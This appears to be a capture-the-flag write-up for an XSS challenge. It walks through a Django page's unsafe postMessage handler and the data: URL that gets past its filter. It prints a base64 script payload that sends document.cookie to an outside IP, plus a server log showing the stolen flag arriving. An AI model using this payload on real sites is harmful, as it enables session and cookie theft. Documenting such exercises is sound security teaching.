- First, we tried a random URL and got a 404 from Django's debug page.
- There was a hint: "Using the URLconf defined in XSSWebSite.urls"
- OK. This challenge is about XSS.
- Then we noticed the JS on the main page:
/**
 * Appends a <script> element with the given src to document.body.
 * There is no allow-list or origin check on src: whatever string is passed
 * (including a data: URL) is loaded and executed in the page's origin.
 * @param {string} src - URL assigned to the new element's src
 */
function lls(src) {
  const tag = document.createElement('script');
  if (!tag) return;
  tag.setAttribute('type', 'text/javascript');
  tag.src = src;
  document.body.appendChild(tag);
};
/**
 * Creates an element from a flat description and optionally appends it.
 * def is [tagName, attrName1, value1, attrName2, value2, ...]; every attribute
 * in def is set as given, so a caller-controlled def can set any attribute,
 * including src.
 * @param {Document} doc - document used to create the element
 * @param {Array<string>} def - tag name followed by attribute name/value pairs
 * @param {Node} [parent] - when truthy, the element is appended to it
 * @returns {Element|false} the created element, or false if creation failed
 */
function lce(doc, def, parent) {
  let node = null;
  if (typeof doc.createElementNS !== "undefined") {
    node = doc.createElementNS("http://www.w3.org/1999/xhtml", def[0]);
  } else if (typeof doc.createElement !== "undefined") {
    node = doc.createElement(def[0]);
  }
  if (!node) return false;
  // Pairs start at index 1; an odd-length tail sets the last name to undefined,
  // exactly as the original i++/i++ loop did.
  for (let i = 1; i < def.length; i += 2) {
    node.setAttribute(def[i], def[i + 1]);
  }
  if (parent) parent.appendChild(node);
  return node;
};
// Accepts cross-window messages. NOTE(review): e.origin is never inspected, so
// no sender restriction is applied before the payload is acted on.
window.addEventListener('message', function (e) {
if (e.data.iframe) {
// Filter on the value: rejects strings containing '.', '//' or the fullwidth
// stop '。', and empty values. The last clause applies typeof to a boolean
// comparison, so it always yields 'boolean' (truthy) and never rejects anything.
// A URL with no dot or '//' (the page shows a data: URL) passes every check.
if (e.data.iframe && e.data.iframe.value.indexOf('.') == -1 && e.data.iframe.value.indexOf("//") == -1 && e.data.iframe.value.indexOf("。") == -1 && e.data.iframe.value && typeof(e.data.iframe != 'object')) {
if (e.data.iframe.type == "iframe") {
// 'doc' is not defined in this listing (presumably a page global — verify);
// 'parent' is presumably the browser's window.parent.
lce(doc, ['iframe', 'width', '0', 'height', '0', 'src', e.data.iframe.value], parent);
} else {
// Any other (or missing) type loads the value as a script src with no allow-list.
lls(e.data.iframe.value)
}
}
}
}, false);
// On load, parses the query string (without the leading '?') as JSON and posts
// it to this window with target origin '*'. NOTE(review): the query string is
// supplied by whoever built the URL, so this turns a crafted URL into an
// accepted 'message' event without any sender check.
window.onload = function (ev) {
  const query = location.search.slice(1);
  const payload = JSON.parse(decodeURIComponent(query));
  postMessage(payload, '*');
};
- OK. We can build JSON which spawns a script block:
{"iframe":{"value":"data:;base64,ZG9jdW1lbnQubG9jYXRpb24gPSAnaHR0cDovLzUxLjY4LjEyNi4xOTcveHNzLnRlc3Q/Jytkb2N1bWVudC5jb29raWU=","type":123}}
- This payload spawns a script block that leaks the user's cookies:
<script type="text/javascript" src="data:;base64,ZG9jdW1lbnQubG9jYXRpb24gPSAnaHR0cDovLzUxLjY4LjEyNi4xOTcveHNzLnRlc3Q/Jytkb2N1bWVudC5jb29raWU="></script>
- We submitted the malformed URL and the flag arrived at our server:
13.57.104.34 - - [28/Jul/2018:14:25:27 +0200] "GET /xss.test?flag=rwctf%7BL00kI5TheFlo9%7D HTTP/1.1" 404 502 "http://127.0.0.1/?%7B%22iframe%22:%7B%22value%22:%22data:;base64,ZG9jdW1lbnQubG9jYXRpb24gPSAnaHR0cDovLzUxLjY4LjEyNi4xOTcveHNzLnRlc3Q/Jytkb2N1bWVudC5jb29raWU=%22,%22type%22:123%7D%7D" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1"